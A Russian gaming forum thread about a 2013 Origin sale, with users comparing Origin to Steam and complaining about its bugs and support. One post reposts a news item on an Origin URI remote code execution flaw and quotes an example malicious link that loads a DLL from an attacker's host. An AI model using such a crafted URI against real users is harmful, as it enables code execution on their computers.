Скидки до 70% в Origin

Тема в разделе "Новости", создана пользователем TF Studio, 20 мар 2013.

Статус темы:
Закрыта.
  1. TF Studio

TF Studio

Симпатии:
    209

Многие люди жалуются на сервис цифрового распространения компьютерных игр и программ компании EA. В любом случае, Origin теперь может похвастаться более чем 39 миллионами зарегистрированных пользователей, Electronic Arts подтвердила эти данные во время «Q3 Earnings Conference Call». Более двух миллионов геймеров зарегистрировано только в январе 2013.

В честь такого события, EA проводит «Player Appreciation Sale» в Origin. Во время этой недели распродаж, более 200 игр будут продаваться со скидкой до 70%. Но продажи не ограничиваются только на PC-версии игр,вы можете получить их и для Xbox 360 или PS3.

• Battlefield 3 $24.99
    • Crysis 3 $29.99
    • Dead Space 3 $29.99
    • Mass Effect 3 $9.99
    • The Walking Dead $10.00
    • FIFA Soccer 13 $19.99
    • Assassin's Creed 3 $34.99
    • The Sims 3 University Life $27.99

Увидеть все скидки вы сможете по следующей ссылке.

источник

2. The Night Fury

The Night Fury Администратор

Симпатии:
    916
    Это уже безвыходная ситуация. Поудалять все свои игры из стима и не дать пользователям купить там — гениально. Выхода два: торрент или Origin.

IMHO:

Серый™ и KorDen нравится это.
  3. KorDen

KorDen Atra esterní ono thelduin!

Симпатии:
    1.398
    Стим не догонят такими скидками, как и количество зареганных поьзователей, тем более с такой политикой "выпилить из стима и гнать только у себя".. У стима по последним данным около 50 миллионов, если не больше, АКТИВНЫХ пользователей, а число зарегистрированных в разы больше....

4. FrozDark

FrozDark Команда сайта HLMod Модератор

Симпатии:
    1.917
    когда появился стим? когда origin? огромная разница

5. Серый™

Серый™ CS:S Server

Симпатии:
    1.153
    Я когда этот ориджин увидел, я охренл, сразу подумалось ложовая пародия на стим, + чтоб поиграть мультиплеер нужно заходить на сайт и там смотреть сервера и потом уже играть, дебилизм.
    Хорошо что у меня нет игр на ориждине.

6. KorDen

KorDen Atra esterní ono thelduin!

Симпатии:
    1.398
    Однако почему-то никто не гонит на ту же десуру... Вот именно, факт в том, что ориджину уже есть в пример стим, бери да копируй, переделывая под себя... Однако такие дурацкие изобретения, как в ориджине, и такие офигенные changelog'и ("пофикшены две никому не нужные кнопки") просто убивают.. Тот же вышеприведенный пример с серверами..
    Многих бесит то, что язык определяется по стране, и чтобы прочитать на другом языке, надо менять страну...
    Таких мелких тупизмов куча, хотя вроде бы - возьми скопируй со стима и не заморачивайся, так нет же...

7. BMW M6

BMW M6

Симпатии:
    569
    Я этот ориджн не люблю за одно.
    Дело было давным давно. Купил себе BF3, радостный вернулся домой, начал активировать. При регистрации указал свой возраст, но по скольку я не достиг 18 лет мне было нельзя играть в БФ3.
    Думал, думал, и на думал) Начал писать в техническую поддержку, что мол так и так дал сыну активировать игру пока сам был на работе, а он поставил свой возраст. (История была хорошая)
    Ну в итоге общения в течение часов 2-3 на английском я получил новый ключ (от расширенного издания, покупал то прстое за 500, а получил за 1200.) Обрадовался, думаю глянь получил за бесплатно расширенное издание. И вот уже прошло около 1 года и 3 месяцев, и я до сих пор играю в английскую версиию игры. В моей игре ни слово по русски по сколько ключ который выдали для америкосов. Менять мне его отказались в ТП. Ну радует, то что получил Расширенное издание. Вот такая вот история :)

8. The Night Fury

The Night Fury Администратор

Симпатии:
    916
    Достаточно вспомнить, что EA подняли срач из-за недовольства. Ещё тогда в Steam была поддержка Crysis 2.
    После того как Valve и EA пересрались между собой, EA и собрались сделать "сервис, которому не будет равных", да только получилось... Получилось как я уже говорил:

И ладно бы просто скопировали магазин и функционал, так нет! Оффтоп Почти всегда занятые серверы, ошибки в работе, дублирование процессов, сжирание большого количества памяти и прочее.

Наш админ не так давно выкладывал скриншот: 7 (!) процессов Origin запущены на одном ПК сами по себе (!!). И все жрут как память, так и процессор.
    И ничего не делается для исправления.

9. tiger_by

tiger_by Гл. Админ SourceGames.RU

Симпатии:
    279
    Ориджин ♥♥♥♥♥ редкое и дырявое. У меня мыло на своем домене, пароли шопипец, а тут недавно пишут, что зашли на мой акк с другого компа. Видать или у них базу тыбрят, или сами раздают, или аутентификация не шифрованная.

10. Серый™

Серый™ CS:S Server

Симпатии:
    1.153
    Новая дыра по хуже других.
    Удалённое исполнение кода через платформу EA Origin

Более 40 миллионов пользователей рискуют стать жертвами новой уязвимости в онлайновой игровой платформе Origin компании Electronic Arts. На конференции Black Hat был показан эксплойт для Origin. Он позволяет исполнять посторонний код на компьютере пользователя. Сама клиентская программа Origin выполняет роль «троянского коня», который позволяет злоумышленнику проникнуть в систему.

Уязвимость обнаружили двое хакеров из компании ReVuln, которые уже неоднократно попадали в новости в связи с найденными багами в самых разных устройствах и приложениях: системах SCADA, телевизорах Samsung, игровой платформе Steam.

Уязвимость в Origin похожа на вышеупомянутую уязвимость в протоколе Steam. Она связана с некорректной обработкой Origin URI. Это позволяет злоумышленнику составить такой URI, который приведёт к удалённому исполнению кода на компьютере локального пользователя. Например, для активации игры в протоколе используются ссылки вроде origin://LaunchGame/71503, но при этом можно передавать ссылки такого вида: origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, так что жертва подгрузит с сервера злоумышленника на исполнение вредоносную библиотеку.

Описание бага см. в докладе (pdf), который авторы опубликовали перед конференцией. Есть также демонстрация на видео .

Оригинал статьи.

Andrey, The Night Fury, KorDen и 2 другим нравится это.
  11. Sergey Grinko

Sergey Grinko

Симпатии:
    12
    Steam лучше, когда-то купил bf3 и пожалел...

12. fallen1994

fallen1994

Симпатии:
    544
    А причем тут собственно игры и сервис? БФ3 это игра, так же как и МЕ3, за что осуждать игру, если сервис Ориджин это не игра, а всего лишь "Доступ" к игре. Купил - играй, из-за ориджина игра хуже не станет. Так что, быдлецо обсирающее игру из-за ориджина - фейл :)

13. Крис Редфилд

Крис Редфилд

Симпатии:
    0
    Никогда не покупал ни чего в ориджине и не буду кормить этих плагиаторов(даже при том что идут скидки)! Steam лучше намного как по защите так и по интерфейсу, а ориджин всего лишь жалкая пародия, которая только и пытается вылезти за счет того что игры от EA не пускают в стим.. EA уже пытались выкупить Steam но старина Гейб им вежливо показал средний палец!

14. Lex26

Lex26 FreeFall

Симпатии:
    28
    Dead Space 3 и BF 3 Это то ради чего я вообще использую ориджин. А так в принципе меня не цепляют сильно другие ориджиновские игры

Чейндж логи в Origin убивают -исправление мелких ошибок . очень информативно...

15. hant17

hant17

Симпатии:
    1
    Сидите в своем стиме и некогда не поиграете в бф

fallen1994 нравится это.
  16. fallen1994

fallen1994

Симпатии:
    544
    И я об этом же, игра не в чем не виновата, что она принадлежит к сервису Ориджина)

Статус темы:
Закрыта.